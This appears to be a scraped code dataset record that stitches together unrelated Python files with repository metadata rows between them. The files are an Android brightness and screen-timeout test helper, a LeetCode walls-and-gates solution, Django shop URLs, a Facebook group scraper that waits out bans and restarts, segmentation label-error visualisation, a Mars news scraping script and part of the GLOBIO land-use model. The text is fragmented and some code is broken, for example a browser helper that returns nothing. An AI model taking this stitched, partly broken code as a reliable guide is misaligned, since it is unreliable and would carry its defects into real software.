    # def set_volume_value(self, stream, value):
    #     cmd = "settings put system %s %s" % (stream, str(value))
    #     sim_code.simplify_no_return(cmd)
    #
    # def check_volume_value(self, stream, value):
    #     act = sim_code.str_replace(self.get_cur_volume_value(stream))
    #     if str(value) != act:
    #         sim_code.print_err_log("音量设置失败!!!")
    #         assert False, "音量设置失败!!!"
    #     sim_code.print_log("音量设置成功!!!")
    def sys_brightness_setting(self):
        """Dump the current system brightness setting into the output file."""
        cmd = "dumpsys power | grep mScreenBrightnessSetting"
        sim_code.simplify_txt_file(cmd, "系统亮度系数:")
    def hand_type_check_default_brightness(self):
        """Manually-assisted check that the default and current brightness
        are both at most 149 (roughly 90% of the 0-255 range).

        Returns:
            int: the device's default brightness value.
        """
        cmd = "dumpsys power | grep mScreenBrightnessSettingDefault"
        def_res = commData.send_shell_cmd(cmd)
        # extract the first numeric token from the dumpsys output
        def_value_list = re.findall(r'\d+\.?\d*', def_res)
        def_value = def_value_list[0]
        cur_value = self.cur_brightness()
        # if def_valule in self.cur_brightness():
        if int(def_value) <= 149 and int(cur_value) <= 149:
            log.info("默认亮度不超过90%")
            my_text.write_text(def_value)
            my_text.write_text(cur_value)
        else:
            err = "@@@默认亮度超过90%, 请手动检查"
            log.error(err)
            my_text.write_text(err)
            my_text.write_text(def_value)
        # else:
        #     err = "系统默认的亮度和当前的亮度不一致"
        #     log.error(err)
        #     assert False, err
        return int(def_value)
    def modify_brightness_time_out(self, time_out):
        """Map a human-readable timeout label to milliseconds and apply it.

        Accepted labels: "永不" ("never", max int32), "15sec", "1min", "5min".
        Unrecognised labels are silently ignored.
        """
        if time_out.strip() == "永不":
            value = str(2147483647)
            self.deal_brigthness_time_out(time_out, value)
        elif time_out.strip() == "15sec":
            value = str(15000)
            self.deal_brigthness_time_out(time_out, value)
        elif time_out.strip() == "1min":
            value = str(60000)
            self.deal_brigthness_time_out(time_out, value)
        elif time_out.strip() == "5min":
            value = str(300000)
            self.deal_brigthness_time_out(time_out, value)
    def hand_type_modify_brightness(self, value=102):
        """Set screen brightness to *value*, prompt the operator to observe
        the change, then assert the setting took effect."""
        # 0:10%, 102:82%, 255:100%
        cmd = "settings put system screen_brightness %s" % str(value)
        text1 = ''
        if value == 0:
            text1 = "亮度已经修改为0了, 检查设置是否为0%, 请观察亮度变化有没有黑屏 "
        elif value == 102:
            text1 = "亮度已经修改为默认亮度了, 请观察亮度变化"
        elif value == 255:
            text1 = "亮度已经修改为100%了, 检查设置是否为100%, 请观察亮度变化"
        meta_alert.getAlert(text=text1)
        # act = self.cur_brightness()
        sim_code.simplify_no_return(cmd)
        # print(type(self.cur_brightness()))
        assertData.assert_text_exit(str(value), self.cur_brightness())
    def test_for_screen_timeout(self):
        """Verify the screen actually sleeps after the configured timeout.

        Sets a 1-minute timeout and samples the display power state around
        the deadline (52-59s), asserting the screen is OFF afterwards; then
        repeats the check with a 15-second timeout, and finally restores the
        "never sleep" setting.  Timing is sequence-sensitive by design.
        """
        self.set_screen_sleep("2147483647")
        self.reboot_dev()
        self.screen_sleep()
        # self.screen_wake()
        self.unlock_screen()
        self.unlock_screen()
        my_text.write_text("##########设置1min后进入休眠################")
        my_text.write_text("开始计算======")
        cmd = "dumpsys power | grep \"Display Power: state=\""
        self.set_screen_sleep("60000")
        my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
        my_text.write_text(str(0) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(52)
        my_text.write_text(str(52) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(2)
        my_text.write_text(str(54) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(1)
        my_text.write_text(str(55) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(1)
        my_text.write_text(str(56) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(1)
        my_text.write_text(str(57) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(1)
        my_text.write_text(str(58) + "秒后 " + commData.send_shell_cmd(cmd))
        time.sleep(1)
        my_text.write_text(str(59) + "秒后 " + commData.send_shell_cmd(cmd))
        my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
        assert "OFF" in self.get_screen_status(), "@@@1min中后进入休眠失败,请检查!!!"
        self.screen_wake()
        self.unlock_screen()
        my_text.write_text("##########设置15sec后进入休眠################")
        my_text.write_text("开始计算======")
        self.set_screen_sleep("15000")
        my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
        for i in range(1, 15):
            time.sleep(1)
            my_text.write_text(str(i) + "秒后 " + commData.send_shell_cmd(cmd))
        my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
        assert "OFF" in self.get_screen_status()
        my_text.write_text("##########设置永不休眠休眠################")
        self.screen_wake()
        self.unlock_screen()
        self.set_screen_sleep("2147483647")
| wmm98/Telpo_TPS469_Automation | ADBInterface/Qualcomm/Android_Versions/Qualcomm_Android_11.py | Qualcomm_Android_11.py | py | 7,148 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Common.DealAlert.AlertData",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "Common.DealAlert",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "Common.Log.MyLog",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "Common.L... |
23992990502 | '''
286. Walls and Gates
https://leetcode.com/problems/walls-and-gates/
'''
from typing import List
from collections import deque
# The key is to recognize that if we search from gates to empty rooms
# We are guaranteed to find the shortest path by using BFS
class Solution:
    def wallsAndGates(self, rooms: List[List[int]]) -> None:
        """
        Fill every empty room (INF) in-place with the distance to its
        nearest gate; walls (-1) and gates (0) are left untouched.
        Do not return anything, modify rooms in-place instead.
        """
        if not rooms:
            return
        n_rows, n_cols = len(rooms), len(rooms[0])
        # Multi-source BFS: seed the frontier with every gate (value 0) so
        # the first time a cell is reached, it is via a shortest path.
        frontier = deque(
            (r, c)
            for r in range(n_rows)
            for c in range(n_cols)
            if rooms[r][c] == 0
        )
        while frontier:
            row, col = frontier.popleft()
            for d_row, d_col in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                nxt_r, nxt_c = row + d_row, col + d_col
                if 0 <= nxt_r < n_rows and 0 <= nxt_c < n_cols:
                    # Relax only cells strictly farther than one more step;
                    # walls (-1) and already-settled cells fail this check,
                    # so they are never overwritten or re-enqueued.
                    if rooms[nxt_r][nxt_c] > rooms[row][col] + 1:
                        rooms[nxt_r][nxt_c] = rooms[row][col] + 1
                        frontier.append((nxt_r, nxt_c))
{
"api_name": "typing.List",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "collections.deque",
"line_number": 34,
"usage_type": "call"
}
] |
23843055382 | from django.urls import path
from .views import Frontpage, Shop, Signup, Login, MyAccount, EditMyAccount
from product.views import ProductDetailView
from django.contrib.auth.views import LogoutView
# URL routing table for the shop: storefront, auth, account, and catalogue.
urlpatterns = [
    # Storefront landing page.
    path('', Frontpage.as_view(), name='frontpage'),
    # Account creation / authentication.
    path('signup/', Signup.as_view(), name='signup'),
    path('login/', Login.as_view(), name='login'),
    # Logged-in account pages (note: no trailing slash on these two paths).
    path('myaccount', MyAccount.as_view(), name='myaccount'),
    path('myaccount/edit', EditMyAccount.as_view(), name='edit_myaccount'),
    path('logout/', LogoutView.as_view(), name='logout'),
    # Product catalogue: listing plus slug-based detail pages.
    path('shop/', Shop.as_view(), name='shop'),
    # path('product/<int:pk>/', ProductDetailView.as_view(), name='product'),
    path('shop/<slug:slug>/', ProductDetailView.as_view(), name='product'),
]
| DenisVasil/Django-Tailwind-Shop | core/urls.py | urls.py | py | 774 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "views.Frontpage.as_view",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "views.Frontpage",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.urls.pat... |
74362482985 | from group_class import FacebookGroups
from scraper import scrape
from db_handler import init_mongo
from datetime import datetime
from rich import print
import config
import time
import random
import os
import sys
# Sleep for the desired time and restart for the sake of establishing new requests session
def sleep_and_restart(time_off):
    """Sleep for *time_off* seconds, then replace this process with a fresh
    interpreter running the same script and arguments (establishes a brand
    new requests session for the scraper)."""
    time.sleep(time_off)
    restart_argv = ['python', __file__] + sys.argv[1:]
    os.execl(sys.executable, *restart_argv)
# Running instances, the main function determines which group will be scraped and when.
# When a group scraping terminates, main will decide what happens next, depending on the cause
def main():
    """Round-robin scraping driver.

    Cycles forever over ``FacebookGroups.reg_list``, scraping one group per
    iteration.  The integer returned by ``scrape`` decides what happens next:
      0 - per-batch post limit reached: reset the counter and restart the
          process after ``config.BREAK_TIME`` seconds,
      1 - the group's run of already-known posts is exhausted: move on,
      2 - temporarily banned by Facebook: restart after ``config.BAN_SLEEP``.
    After a full pass over all groups the process also sleeps and restarts
    (``sleep_and_restart`` never returns -- it exec's a fresh interpreter).
    """
    init_mongo()
    list_size = len(FacebookGroups.reg_list)
    i = 0
    dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
    print(f"\n[green]{dt_string} Scraper initiated")
    while True:
        print(f"\n[green]Group Num: {i+1}\nGroup name: {FacebookGroups.reg_list[i % list_size].name}")
        # scrape() receives the group's attributes as keyword arguments.
        kwargs = FacebookGroups.reg_list[i % list_size].__dict__
        state = scrape(**kwargs)
        dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
        if state == 0:
            print(f"\n[green]{dt_string} Breaking after reaching max number of posts per batch. "
                  f"Scraping of next batch will begin in {str(config.BREAK_TIME/60/60)} hrs")
            FacebookGroups.batch_posts = 0
            sleep_and_restart(config.BREAK_TIME)
        elif state == 1:
            print(f"\n[green]{dt_string} Scraping of {FacebookGroups.reg_list[i % list_size].name} terminated after it's"
                  f" gone through {FacebookGroups.reg_list[i % len(FacebookGroups.reg_list)].max_known} known posts")
        elif state == 2:
            print(f"\n[red]{dt_string} Temporarily banned by Facebook. "
                  f"Scraping of next batch will begin in {str(config.BAN_SLEEP/60/60)} hrs")
            sleep_and_restart(config.BAN_SLEEP)
        i += 1
        if i % list_size == 0:
            # NOTE(review): dt_string here is the timestamp taken after the
            # last scrape, not "now" -- confirm this is intentional.
            print(f"\n[green]{dt_string} Breaking after covering all groups. "
                  f"Scraping of next batch will begin in {str(config.BREAK_TIME/60/60)} hrs")
            sleep_and_restart(config.BREAK_TIME)
'''
#### START HERE #####
Add group instances, mandatory attributes are group name and group id
Unless specified, all other attributes will be set as configured in config.py
'''
if __name__ == '__main__':
    # These are example public groups:
    jackson_heights = FacebookGroups('Jackson Heights', 35851988964)
    ilsington = FacebookGroups('Ilsington', 743308202528264)
    uppereast = FacebookGroups('Upper East Side', 'uppereastside35andolder')
    # The locals above are otherwise unused -- presumably the FacebookGroups
    # constructor registers each instance in FacebookGroups.reg_list, which
    # main() iterates over.  TODO confirm against group_class.FacebookGroups.
    main()
| itamark87/Project-Ekron | main.py | main.py | py | 2,648 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.sleep",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.execl",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "sys.executable",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number":... |
13069484239 |
import os
import numpy as np
from PIL import Image, ImageDraw, ImageFont
from scipy.ndimage import label
from config import cfg
import labels
def benchmark_vis(iou_ar, fn):
    """Save an RGB benchmark overlay for image *fn*: the red channel holds
    the size-filtered error proposals from *iou_ar*, the green channel the
    network's inference mask."""
    # Keep only connected components (8-connectivity) of iou_ar that reach
    # the configured minimum size; everything else stays zero.
    filtered = np.zeros_like(iou_ar)
    connectivity = np.ones((3, 3), dtype=int)
    labeled, _ = label(iou_ar, connectivity)
    for component_id in np.unique(labeled):
        if component_id <= 0:
            continue
        member_idx = np.where(labeled == component_id)
        if len(member_idx[0]) >= cfg.MIN_ERROR_SIZE:
            filtered[member_idx] = iou_ar[member_idx]
    # Inference masks share the file suffix of the ground-truth masks.
    suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
    inference = np.asarray(
        Image.open(os.path.join(cfg.INFERENCE_OUTPUT_DIR, fn + "." + suffix)),
        dtype="uint8")
    overlay = np.zeros(filtered.shape + (3,), dtype='uint8')
    overlay[:, :, 0] = filtered
    overlay[:, :, 1] = inference
    Image.fromarray(overlay).save(
        os.path.join(cfg.BENCHMARK_PROPOSAL_VIS_DIR, fn + "_proposals.png"))
def label_error_vis(fn):
    """Save a label-error visualisation for image *fn*: connected error
    components below the minimum size are dropped, and the surviving error
    pixels take on their ground-truth class id."""
    diff_mask = np.load(os.path.join(cfg.DIFF_DIR, fn + "_diff_map.npy"))
    img_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
    gt_mask = np.array(
        Image.open(os.path.join(cfg.GT_MASKS_DIR, fn + "." + img_suffix)))
    # Zero out 8-connected error components smaller than the threshold.
    components, _ = label(diff_mask, np.ones((3, 3), dtype=int))
    for component_id in np.unique(components):
        if component_id <= 0:
            continue
        member_idx = np.where(components == component_id)
        if len(member_idx[0]) < cfg.MIN_ERROR_SIZE:
            diff_mask[member_idx] = 0
    # Replace the remaining error pixels (value 1) with the GT label.
    surviving = diff_mask == 1
    diff_mask[surviving] = gt_mask[surviving]
    Image.fromarray(diff_mask).save(
        os.path.join(cfg.ERROR_DIR, fn + "_label_errors." + img_suffix))
def proposal_vis(iou, fn, seg_id, cls_id):
    """Visualization of one potential label error in image fn.

    Builds a 2x2 panel (raw input, prediction blend, GT colour map,
    prediction colour map), draws a bounding box around the suspect
    segment *seg_id*, and saves it under the first free proposal index.

    Args:
        iou: unused here; kept for interface compatibility with callers.
        fn: image file name without suffix.
        seg_id: id of the suspect component in the saved components map.
        cls_id: predicted train id of the segment (used for the caption).
    """
    inf_mask_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
    inf_ar = np.asarray(Image.open(os.path.join(cfg.INFERENCE_OUTPUT_DIR, fn + "." + inf_mask_suffix)), dtype="uint8")
    gt_mask_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
    net_input_suffix = os.listdir(cfg.NET_INPUT_DIR)[0].split(".")[-1]
    gt_mask = np.array(Image.open(os.path.join(cfg.GT_MASKS_DIR, fn + "." + gt_mask_suffix)))
    net_input = np.array(Image.open(os.path.join(cfg.NET_INPUT_DIR, fn + "." + net_input_suffix)))
    # Dataset-specific colour/name lookup tables (selected via cfg.DATASET).
    Dataset = getattr(labels, cfg.DATASET.capitalize())
    trainId2color = Dataset.trainId2color
    trainId2name = Dataset.trainId2name
    num_classes = Dataset.num_classes
    # Colourise the ground-truth and prediction masks per train id.
    gt_rgb = np.zeros(inf_ar.shape + (3,), dtype="uint8")
    pred_rgb = np.zeros(inf_ar.shape + (3,), dtype="uint8")
    for id in range(num_classes):
        gt_rgb[gt_mask==id] = trainId2color[id]
        pred_rgb[inf_ar==id] = trainId2color[id]
    rgb_blend_img = np.copy(net_input)
    components = np.load(os.path.join(cfg.COMPONENTS_DIR, fn + "_components.npy"))
    seg_idx = np.where(np.abs(components)==seg_id)
    # Bounding box with a 15 px margin; PIL expects (x, y) = (column, row).
    # Bug fix: the y coordinate must be clamped to the image height
    # (shape[0]); the original clamped both coordinates to the width
    # (shape[1]), which is wrong for non-square images.
    bbox_0 = (max(np.min(seg_idx[1])-15, 0), max(np.min(seg_idx[0])-15, 0))
    bbox_1 = (min(np.max(seg_idx[1])+15, rgb_blend_img.shape[1]), min(np.max(seg_idx[0])+15, rgb_blend_img.shape[0]))
    # Blend the prediction colours into the raw image inside the segment.
    rgb_blend_img[seg_idx] = 0.4*rgb_blend_img[seg_idx] + 0.6*pred_rgb[seg_idx]
    img_shape = rgb_blend_img.shape[0]
    net_input = Image.fromarray(net_input)
    rgb_blend_img = Image.fromarray(rgb_blend_img)
    gt_rgb_img = Image.fromarray(gt_rgb)
    pred_rgb_img = Image.fromarray(pred_rgb)
    # Font size scales with image height; assumes arial.ttf is resolvable
    # by Pillow on this host -- TODO confirm on non-Windows systems.
    font = ImageFont.truetype("arial.ttf", size=int(0.05*img_shape))
    draw = ImageDraw.Draw(rgb_blend_img)
    draw.rectangle([bbox_0, bbox_1], outline='red', width=4)
    draw.text((0, 0), "Predicted Label: " + trainId2name[int(cls_id)], fill='red', font=font)
    draw = ImageDraw.Draw(net_input)
    draw.rectangle([bbox_0, bbox_1], outline='red', width=4)
    draw.text((0, 0), "Ground Truth", fill='red', font=font)
    draw = ImageDraw.Draw(gt_rgb_img)
    draw.rectangle([bbox_0, bbox_1], outline='white', width=4)
    draw = ImageDraw.Draw(pred_rgb_img)
    draw.rectangle([bbox_0, bbox_1], outline='white', width=4)
    # Assemble the 2x2 output panel.
    out_img = Image.new('RGB', (2*rgb_blend_img.width, 2*rgb_blend_img.height))
    out_img.paste(net_input, (0, 0))
    out_img.paste(rgb_blend_img, (0, net_input.height))
    out_img.paste(gt_rgb_img, (net_input.width, 0))
    out_img.paste(pred_rgb_img, (net_input.width, net_input.height))
    # Find the first free proposal index.  Bug fix: the original probed
    # for existence with open() inside a try, which leaked a file handle
    # per existing proposal; os.path.exists avoids opening the file.
    i = 0
    while os.path.exists(os.path.join(cfg.ERROR_PROPOSAL_DIR, fn + f"_proposal_{i}." + net_input_suffix)):
        i += 1
    out_img.save(os.path.join(cfg.ERROR_PROPOSAL_DIR, fn + f"_proposal_{i}." + net_input_suffix))
{
"api_name": "numpy.zeros_like",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.label",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"l... |
7244240814 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
# Dependencies
import os
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
# In[2]:
def init_browser():
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
mars_dict={}
# In[3]:
url = "https://redplanetscience.com/"
browser.visit(url)
# In[4]:
html = browser.html
soup = BeautifulSoup(html, "html.parser")
# # NASA Mars News
# Scrape the Mars News Site and collect the latest News Title and Paragraph Text. Assign the text to variables that you can reference later.
# In[5]:
news_title = soup.find_all('div', class_ ='content_title')[0].text
news_p = soup.find_all('div', class_ ='article_teaser_body')[0].text
print(news_title)
print(news_p)
# In[6]:
browser.quit()
# # JPL Mars Space Images - Featured Image
# In[7]:
# Visit the following URL
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
url = "https://spaceimages-mars.com/"
browser.visit(url)
# In[8]:
#Use splinter to navigate the site and find the image url for the current Featured Mars Image and
#assign the url string to a variable called featured_image_url.
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
image = soup.find("img", class_="headerimage fade-in")["src"]
featured_image_url = url + image
featured_image_url
# In[9]:
browser.quit()
# # Mars Facts
# In[10]:
#Use Pandas to scrape the table containing facts about the planet
url = 'https://space-facts.com/mars/'
tables_facts = pd.read_html(url)
tables_facts
# In[11]:
#Convert data to dataframe
facts_df = tables_facts[0]
facts_df.columns = ['Parameter', 'Value']
facts_df
# In[12]:
#Convert the data to a HTML table string
html = facts_df.to_html()
print(html)
# # Mars Hemispheres
# In[13]:
#Visit Mars Hemispheres url to obtain high resolution images for each of Mar's hemispheres.
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
hemis_url = "https://marshemispheres.com/"
browser.visit(hemis_url)
# In[14]:
# Collect the urls by clicking each of the links to the hemispheres
#Retrieve the titles and urls and append to list
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
hemispheres = soup.find_all('div', class_='item')
hemisphere_image_urls = {}
hemisph_title = []
img_urls = []
for hemisphere in hemispheres:
title = hemisphere.find('h3').text
main_url = hemis_url + hemisphere.find('a')['href']
browser.visit(main_url)
img_html = browser.html
soup = BeautifulSoup(img_html, 'html.parser')
image_url = hemis_url + soup.find('img', class_='wide-image')['src']
hemisphere_image_urls = {
"title" : title,
"img_url" : image_url
}
print(hemisphere_image_urls)
# In[15]:
browser.quit()
| mshi2/web-scraping-challenge | Missions_to_Mars/scrape_mars.py | scrape_mars.py | py | 3,178 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "splinter.Browser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "splinter.Browser",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup... |
30323488487 | """GLOBIO InVEST Model"""
import os
import logging
import gdal
import osr
import numpy
import pygeoprocessing
logging.basicConfig(format='%(asctime)s %(name)-20s %(levelname)-8s \
%(message)s', level=logging.DEBUG, datefmt='%m/%d/%Y %H:%M:%S ')
LOGGER = logging.getLogger('invest_natcap.globio.globio')
def execute(args):
"""main execute entry point"""
#append a _ to the suffix if it's not empty and doens't already have one
try:
file_suffix = args['results_suffix']
if file_suffix != "" and not file_suffix.startswith('_'):
file_suffix = '_' + file_suffix
except KeyError:
file_suffix = ''
pygeoprocessing.geoprocessing.create_directories([args['workspace_dir']])
if not args['predefined_globio']:
out_pixel_size = pygeoprocessing.geoprocessing.get_cell_size_from_uri(
args['lulc_uri'])
else:
out_pixel_size = pygeoprocessing.geoprocessing.get_cell_size_from_uri(
args['globio_lulc_uri'])
if not args['predefined_globio']:
#reclassify the landcover map
lulc_to_globio_table = pygeoprocessing.geoprocessing.get_lookup_from_table(
args['lulc_to_globio_table_uri'], 'lucode')
lulc_to_globio = dict(
[(lulc_code, int(table['globio_lucode'])) for
(lulc_code, table) in lulc_to_globio_table.items()])
intermediate_globio_lulc_uri = os.path.join(
args['workspace_dir'], 'intermediate_globio_lulc%s.tif' % file_suffix)
globio_nodata = -1
pygeoprocessing.geoprocessing.reclassify_dataset_uri(
args['lulc_uri'], lulc_to_globio, intermediate_globio_lulc_uri,
gdal.GDT_Int32, globio_nodata, exception_flag='values_required')
globio_lulc_uri = os.path.join(
args['workspace_dir'], 'globio_lulc%s.tif' % file_suffix)
sum_yieldgap_uri = args['sum_yieldgap_uri']
potential_vegetation_uri = args['potential_vegetation_uri']
pasture_uri = args['pasture_uri']
#smoothed natural areas are natural areas run through a gaussian filter
natural_areas_uri = os.path.join(
args['workspace_dir'], 'natural_areas%s.tif' % file_suffix)
natural_areas_nodata = -1
def natural_area_mask_op(lulc_array):
"""masking out natural areas"""
nodata_mask = lulc_array == globio_nodata
result = (
(lulc_array == 130) | (lulc_array == 1))
return numpy.where(nodata_mask, natural_areas_nodata, result)
LOGGER.info("create mask of natural areas")
pygeoprocessing.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri], natural_area_mask_op,
natural_areas_uri, gdal.GDT_Int32, natural_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
LOGGER.info('gaussian filter natural areas')
sigma = 9.0
gaussian_kernel_uri = os.path.join(
args['workspace_dir'], 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(sigma, gaussian_kernel_uri)
smoothed_natural_areas_uri = os.path.join(
args['workspace_dir'], 'smoothed_natural_areas%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.convolve_2d_uri(
natural_areas_uri, gaussian_kernel_uri, smoothed_natural_areas_uri)
ffqi_uri = os.path.join(
args['workspace_dir'], 'ffqi%s.tif' % file_suffix)
def ffqi_op(natural_areas_array, smoothed_natural_areas):
"""mask out ffqi only where there's an ffqi"""
return numpy.where(
natural_areas_array != natural_areas_nodata,
natural_areas_array * smoothed_natural_areas,
natural_areas_nodata)
LOGGER.info('calculate ffqi')
pygeoprocessing.geoprocessing.vectorize_datasets(
[natural_areas_uri, smoothed_natural_areas_uri], ffqi_op,
ffqi_uri, gdal.GDT_Float32, natural_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#remap globio lulc to an internal lulc based on ag and yield gaps
#these came from the 'expansion_scenarios.py' script as numbers Justin
#provided way back on the unilever project.
high_intensity_agriculture_threshold = float(args['high_intensity_agriculture_threshold'])
pasture_threshold = float(args['pasture_threshold'])
yieldgap_threshold = float(args['yieldgap_threshold'])
primary_threshold = float(args['primary_threshold'])
sum_yieldgap_nodata = pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['sum_yieldgap_uri'])
potential_vegetation_nodata = (
pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['potential_vegetation_uri']))
pasture_nodata = pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['pasture_uri'])
def create_globio_lulc(
lulc_array, sum_yieldgap, potential_vegetation_array, pasture_array,
ffqi):
#Step 1.2b: Assign high/low according to threshold based on yieldgap.
nodata_mask = lulc_array == globio_nodata
high_low_intensity_agriculture = numpy.where(
sum_yieldgap < yieldgap_threshold *
high_intensity_agriculture_threshold, 9.0, 8.0)
#Step 1.2c: Stamp ag_split classes onto input LULC
lulc_ag_split = numpy.where(
lulc_array == 132.0, high_low_intensity_agriculture, lulc_array)
nodata_mask = nodata_mask | (lulc_array == globio_nodata)
#Step 1.3a: Split Scrublands and grasslands into pristine
#vegetations, livestock grazing areas, and man-made pastures.
three_types_of_scrubland = numpy.where(
(potential_vegetation_array <= 8) & (lulc_ag_split == 131), 6.0,
5.0)
three_types_of_scrubland = numpy.where(
(three_types_of_scrubland == 5.0) &
(pasture_array < pasture_threshold), 1.0,
three_types_of_scrubland)
#Step 1.3b: Stamp ag_split classes onto input LULC
broad_lulc_shrub_split = numpy.where(
lulc_ag_split == 131, three_types_of_scrubland, lulc_ag_split)
#Step 1.4a: Split Forests into Primary, Secondary
four_types_of_forest = numpy.empty(lulc_array.shape)
#1.0 is primary forest
four_types_of_forest[(ffqi >= primary_threshold)] = 1
#3 is secondary forest
four_types_of_forest[(ffqi < primary_threshold)] = 3
#Step 1.4b: Stamp ag_split classes onto input LULC
globio_lulc = numpy.where(
broad_lulc_shrub_split == 130, four_types_of_forest,
broad_lulc_shrub_split) #stamp primary vegetation
return numpy.where(nodata_mask, globio_nodata, globio_lulc)
LOGGER.info('create the globio lulc')
pygeoprocessing.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri, sum_yieldgap_uri,
potential_vegetation_uri, pasture_uri, ffqi_uri],
create_globio_lulc, globio_lulc_uri, gdal.GDT_Int32, globio_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
else:
LOGGER.info('no need to calcualte GLOBIO LULC because it is passed in')
globio_lulc_uri = args['globio_lulc_uri']
globio_nodata = pygeoprocessing.get_nodata_from_uri(globio_lulc_uri)
"""This is from Justin's old code:
#Step 1.2b: Assign high/low according to threshold based on yieldgap.
#high_low_intensity_agriculture_uri = args["export_folder"]+"high_low_intensity_agriculture_"+args['run_id']+".tif"
high_intensity_agriculture_threshold = 1 #hardcode for now until UI is determined. Eventually this is a user input. Do I bring it into the ARGS dict?
high_low_intensity_agriculture = numpy.where(sum_yieldgap < float(args['yieldgap_threshold']*high_intensity_agriculture_threshold), 9.0, 8.0) #45. = average yieldgap on global cells with nonzero yieldgap.
#Step 1.2c: Stamp ag_split classes onto input LULC
broad_lulc_ag_split = numpy.where(broad_lulc_array==132.0, high_low_intensity_agriculture, broad_lulc_array)
#Step 1.3a: Split Scrublands and grasslands into pristine vegetations,
#livestock grazing areas, and man-made pastures.
three_types_of_scrubland = numpy.zeros(scenario_lulc_array.shape)
potential_vegetation_array = geotiff_to_array(aligned_agriculture_uris[0])
three_types_of_scrubland = numpy.where((potential_vegetation_array <= 8) & (broad_lulc_ag_split== 131), 6.0, 5.0) # < 8 min potential veg means should have been forest, 131 in broad is grass, so 1.0 implies man made pasture
pasture_array = geotiff_to_array(aligned_agriculture_uris[1])
three_types_of_scrubland = numpy.where((three_types_of_scrubland == 5.0) & (pasture_array < args['pasture_threshold']), 1.0, three_types_of_scrubland)
#Step 1.3b: Stamp ag_split classes onto input LULC
broad_lulc_shrub_split = numpy.where(broad_lulc_ag_split==131, three_types_of_scrubland, broad_lulc_ag_split)
#Step 1.4a: Split Forests into Primary, Secondary, Lightly Used and Plantation.
sigma = 9
primary_threshold = args['primary_threshold']
secondary_threshold = args['secondary_threshold']
is_natural = (broad_lulc_shrub_split == 130) | (broad_lulc_shrub_split == 1)
blurred = scipy.ndimage.filters.gaussian_filter(is_natural.astype(float), sigma, mode='constant', cval=0.0)
ffqi = blurred * is_natural
four_types_of_forest = numpy.empty(scenario_lulc_array.shape)
four_types_of_forest[(ffqi >= primary_threshold)] = 1.0
four_types_of_forest[(ffqi < primary_threshold) & (ffqi >= secondary_threshold)] = 3.0
four_types_of_forest[(ffqi < secondary_threshold)] = 4.0
#Step 1.4b: Stamp ag_split classes onto input LULC
globio_lulc = numpy.where(broad_lulc_shrub_split == 130 ,four_types_of_forest, broad_lulc_shrub_split) #stamp primary vegetation
return globio_lulc"""
#load the infrastructure layers from disk
infrastructure_filenames = []
infrastructure_nodata_list = []
for root_directory, _, filename_list in os.walk(
args['infrastructure_dir']):
for filename in filename_list:
LOGGER.debug(filename)
if filename.lower().endswith(".tif"):
LOGGER.debug("tiff added %s", filename)
infrastructure_filenames.append(
os.path.join(root_directory, filename))
